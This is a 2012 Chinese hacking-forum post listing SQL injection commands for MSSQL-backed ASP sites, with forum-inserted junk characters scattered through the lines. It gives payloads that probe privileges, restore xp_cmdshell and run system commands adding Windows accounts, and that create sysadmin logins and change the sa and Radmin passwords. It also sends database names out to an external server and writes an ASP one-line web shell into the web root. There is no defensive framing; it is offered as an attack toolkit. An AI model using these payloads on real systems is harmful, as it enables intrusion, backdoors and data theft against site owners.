找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 1742|回复: 0
打印 上一主题 下一主题

阿D常用的一些注入命令

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-13 17:26:30 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
阿D常用的一些注入命令! b# K0 F) S! s& V
//看看是什么权限的
* ]+ A' k+ y  O1 B4 u: Iand 1=(Select IS_MEMBER('db_owner'))
3 T9 z# q, E- P5 J: P5 ^And char(124)%2BCast(IS_MEMBER('db_owner') as varchar(1))%2Bchar(124)=1 ;--* W' p! B' j' A; {# F

& i' W9 X4 c$ g5 C//检测是否有读取某数据库的权限4 h' r/ R7 e' a! X4 K
and 1= (Select HAS_DBACCESS('master'))0 @+ a$ N; N9 m# f4 h! i" y. u- x1 z+ c
And char(124)%2BCast(HAS_DBACCESS('master') as varchar(1))%2Bchar(124)=1 --
+ }5 e" ]/ `9 D. Z0 g# A
0 z+ Y" b* n6 e2 l
; H4 ~' B) h. h( F. V; Y数字类型5 R- i  R: j0 s3 B; H& Z/ b/ M" p
and char(124)%2Buser%2Bchar(124)=0
% @4 {( L/ I5 F; V, O
( L0 x" J6 d5 A( k; l  g  P6 l字符类型4 |  i3 G9 q+ E! ^7 f
' and char(124)%2Buser%2Bchar(124)=0 and ''='
8 F9 ?% f, Y, l) p) r6 p; a0 T- I% m2 a" Y6 ~+ ~
搜索类型
9 x& T7 y" R& X7 p2 u' and char(124)%2Buser%2Bchar(124)=0 and '%'='; f2 T5 E9 ]- L- `/ a: Z' K
' n5 \4 C( E% ?1 z- _+ m
爆用户名( h" {6 Z8 Y) S/ R* F0 ?) E
and user>0
3 t+ N6 s$ K0 ~5 |0 A3 [9 q1 x  `' and user>0 and ''='4 q$ x( t2 _7 V/ \* y" a

  k& ]* A4 N. u! O检测是否为SA权限
3 Q! E* T8 p) c4 uand 1=(select IS_SRVROLEMEMBER('sysadmin'));--
- r4 c' O8 Y6 ^0 Q. h7 }( b, K9 [And char(124)%2BCast(IS_SRVROLEMEMBER(0x730079007300610064006D0069006E00) as varchar(1))%2Bchar(124)=1 --
' S# w. j, _. E1 Q# H# V  E) Q( M
检测是不是MSSQL数据库0 w8 d8 A6 u6 j4 ]
and exists (select * from sysobjects);-- 9 ]9 g  q0 t) |( _. q) A* Q" ]
2 r6 H3 r) V3 c- F' L* X: T' d+ ?
检测是否支持多行
* H+ W# o& l% m/ P;declare @d int;-- # z) t  }( O4 A* p3 g* [8 p

; U' q9 Q, L: o! x恢复 xp_cmdshell: Y; l0 s" O# S9 l
;exec master..dbo.sp_addextendedproc 'xp_cmdshell','xplog70.dll';--
+ N- d9 q0 x# {2 {( d1 B" p/ w% x0 W  g' B& \/ s9 D
$ B$ ^; N& Y8 B
select * from openrowset('sqloledb','server=192.168.1.200,1433;uid=test;pwd=pafpaf','select @@version') : l: `1 W) O$ m# S; m, }( P7 L

6 [. @. g1 M  ^- c6 e: n//-----------------------; ^5 S) j; Q9 i, _" `$ A& s- R0 ?
//      执行命令1 O0 e% j' W  s' b4 h
//-----------------------. Y8 A7 b( p# L/ `5 j
首先开启沙盘模式:6 X1 x( h( h) f% {8 o1 [
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
7 ~3 O" ?: z  O3 }9 A, z; v6 h+ x3 t7 z+ D4 n0 j
然后利用jet.oledb执行系统命令
4 T; Z: E; h& g: \7 ?8 s) _select * from openrowset('microsoft.jet.oledb.4.0',';database=c:\winnt\system32\ias\ias.mdb','select shell("cmd.exe /c net user admin admin1234 /add")')/ Y0 F$ ~2 Z' b+ c) ]# W

# x/ a) c* K1 p. m  z执行命令
9 x$ H! c  L- K! M;DECLARE @shell INT EXEC SP_OAcreate 'wscript.shell',@shell OUTPUT EXEC SP_OAMETHOD @shell,'run',null, 'C:\WINNT\system32\cmd.exe /c net user paf pafpaf /add';--
2 [/ D# g7 h+ v' z# l# A' I* G1 u6 I. Z  i3 K& K$ j0 c8 K! L9 _( x- b
EXEC [master].[dbo].[xp_cmdshell] 'cmd /c md c:\1111'
% T7 a3 f5 h" x4 q8 q9 H" f! ]
0 m" W) E7 p7 P' B" l2 {- h8 O判断xp_cmdshell扩展存储过程是否存在:
; L8 j* C* F$ G& B0 G5 c1 l. Ghttp://192.168.1.5/display.asp?keyno=188 and 1=(Select count(*) FROM master.dbo.sysobjects Where xtype = 'X' AND name = 'xp_cmdshell')
/ u1 B8 \2 u" v( d
5 \  q; y" M7 E' m' K2 i: j& T% p写注册表5 P1 Q* ?; W  [, k+ i5 S: U
exec master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',1
! k6 ?, X. _6 [- F5 I& M$ [
/ X' C& g! Z* `+ fREG_SZ
4 Z' E1 h4 j6 }, f# G" X6 ?6 Q1 ]% J4 ^/ P
读注册表
4 Y+ O" F6 @% ?& `- w( Hexec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon','Userinit'
( E, ^2 Y# A" Y
- S; ?) b3 M7 ~0 A: j  p4 i读取目录内容5 h+ E) G  w" H9 C6 T" H7 G- W
exec master..xp_dirtree 'c:\winnt\system32\',1,14 B* Z2 }5 \: d: P
1 \$ I) C* i8 t/ M" `& c' r

/ f3 g2 k7 D- t, F6 o  ~数据库备份
6 R% N) I3 J# X. Ebackup database pubs to disk = 'c:\123.bak'
0 Q" @+ P' _5 I2 X% v5 A4 X) q! Q6 l- ]1 S1 e! N
//爆出长度1 n+ r& h) `6 l
And (Select char(124)%2BCast(Count(1) as varchar(8000))%2Bchar(124) From D99_Tmp)=0 ;--4 N! E1 r0 X, \5 n. p+ N/ i; z
" x1 E+ @7 R+ O, J4 j$ ^7 G

! T% ?4 u3 [) [/ G. D# F# I" g( U+ f$ x! C
更改sa口令方法:用sql综合利用工具连接后,执行命令:
3 K( _8 |( J0 `. p. R) H' p$ Qexec sp_password NULL,'新密码','sa'
3 t. [; K# i7 L' K# g# E/ e1 H. |- o7 ^$ G1 P( _$ P9 _, j9 t9 W0 k( h
添加和删除一个SA权限的用户test:
* N# Z, c- L2 D  v9 X: D1 gexec master.dbo.sp_addlogin test,ptlove
6 {0 Q; K5 b  fexec master.dbo.sp_addsrvrolemember test,sysadmin; A% i0 ?1 z  h+ y( ?

% f- B3 W2 r% ]% v7 w删除扩展存储过过程xp_cmdshell的语句:
% A. O. T0 f  Q; ]exec sp_dropextendedproc 'xp_cmdshell'# b; B3 k% H% ^( n! f. V
6 k7 J( r3 V) P+ L
添加扩展存储过过程$ [5 m) J5 H; e) k; X
EXEC [master]..sp_addextendedproc 'xp_proxiedadata', 'c:\winnt\system32\sqllog.dll'
3 O1 ^" z) P+ Y# {% V4 ?* ?GRANT exec On xp_proxiedadata TO public
) @6 [9 A  m8 S! t+ A* g: n
. }" Z2 w3 k& u* c! j* w
! v" P" n& t2 b) f( V$ I停掉或激活某个服务。
* c6 ~1 R, e0 i( t
$ A  c( m# ~) Oexec master..xp_servicecontrol 'stop','schedule'+ X5 l/ z0 ~! A- w6 W9 @" n
exec master..xp_servicecontrol 'start','schedule'2 o/ P, G( B5 ^$ z% N5 v
- z& w" i: t/ F1 M* W: O
dbo.xp_subdirs
4 F& p; @4 }6 e+ h6 K% Q, v: b# p1 l8 _' U
只列某个目录下的子目录。
) @/ O( q5 o4 w8 Q$ [xp_getfiledetails 'C:\Inetpub\wwwroot\SQLInject\login.asp'
2 [8 t/ u0 `$ e) S4 c9 B$ {
( L; p2 g0 A5 @dbo.xp_makecab
$ k; s3 E; e) {
; |! l) w/ B: v5 _将目标多个档案压缩到某个目标档案之内。( w1 `$ z& H( Y& m
所有要压缩的档案都可以接在参数列的最后方,以逗号隔开。- X- ~3 X! J3 {8 V8 ^# F1 x( Y
( X8 y; i9 s; |- ]; e& f9 ]7 \+ E
dbo.xp_makecab3 v! b0 b/ U( J$ R5 c
'c:\test.cab','mszip',1,
" k: y) d5 U3 X% f) k) r'C:\Inetpub\wwwroot\SQLInject\login.asp',
+ n% G! P; v# C' [8 j, |'C:\Inetpub\wwwroot\SQLInject\securelogin.asp'
# e# x- V$ z+ M* H! r7 c$ {3 [. D5 Z7 j, f% r
xp_terminate_process
( d  @6 G3 t3 K5 d' i6 P: l$ W
5 ?. I" Y( @) R; P" c0 U停掉某个执行中的程序,但赋予的参数是 Process ID。
. Q. L+ X4 l; D! i* t5 g利用”工作管理员”,透过选单「检视」-「选择字段」勾选 pid,就可以看到每个执行程序的 Process ID
% e! A$ K) D: q* V% {) E$ y, T6 X, {) ~- B
xp_terminate_process 2484
( |, `+ r1 I. |: `7 \8 d
0 B2 x7 D9 T" p5 n( D" |/ gxp_unpackcab
: k8 u, I# b. D/ \, O. [" D5 O
) p4 W  Q" L. N3 U- m, U/ h解开压缩档。; C5 ~/ E0 u6 Q& v5 `
* D2 _- S' B8 O: U# f3 H  l
xp_unpackcab 'c:\test.cab','c:\temp',1
6 [+ A9 o9 b6 y# u) q0 |
9 @+ i2 [: I1 H( E; Z5 t: h' q* |
3 r! A1 I, Z& H/ ?某机,安装了radmin,密码被修改了,regedit.exe不知道被删除了还是被改名了,net.exe不存在,没有办法使用regedit /e 导入注册文件,但是mssql是sa权限,使用如下命令 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','Parameter','REG_BINARY',0x02ba5e187e2589be6f80da0046aa7e3c 即可修改密码为12345678。如果要修改端口值 EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SYSTEM\RAdmin\v2.0\Server\Parameters','port','REG_BINARY',0xd20400 则端口值改为1234
; M- q2 [& u9 B0 I4 G, @$ J6 O% H. E
create database lcx;
, d; k  T6 e$ c8 F* [Create TABLE ku(name nvarchar(256) null);; `. Q+ v  l# T1 |1 ]$ \5 ?. i* E2 C
Create TABLE biao(id int NULL,name nvarchar(256) null);" y3 W+ |7 {, X8 C
7 D5 S% h! B/ z. {7 q2 T; H! X& U7 c
//得到数据库名% z8 [7 u8 g; ^) n
insert into opendatasource('sqloledb','server=211.39.145.163,1443;uid=test;pwd=pafpaf;database=lcx').lcx.dbo.ku select name from master.dbo.sysdatabases2 P2 @0 B' q/ n: ~! S
- T( e7 M3 L7 ]! {2 @

) f6 p6 |7 }0 o5 N- d# g4 ~//在Master中创建表,看看权限怎样
; `) C6 R0 T. y% u! j( hCreate TABLE master..D_TEST(id nvarchar(4000) NULL,Data nvarchar(4000) NULL);--$ a0 R$ f* f0 n8 n  K% I  V% b
/ [5 S, J1 r8 x2 \2 g
用 sp_makewebtask直接在web目录里写入一句话马:1 V1 {% _9 o1 {+ z) r# a4 {
http://127.0.0.1/dblogin123.asp?username=123';exec%20sp_makewebtask%20'd:\www\tt\88.asp','%20select%20''<%25execute(request("a"))%25>''%20';--
* |+ Z5 M# V" X; `: Q' J2 o" J* Z/ c$ F6 W* G: q
//更新表内容
+ S+ p' Z' f3 Q4 [7 LUpdate films SET kind = 'Dramatic' Where id = 1230 m3 a. X- q8 o. Q+ `+ c; I7 Q
& |! R( B7 _0 m9 L1 n; k
//删除内容
# y9 r8 m9 G6 J; j; g0 z1 \8 P: {3 [% zdelete from table_name where Stockid = 3
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表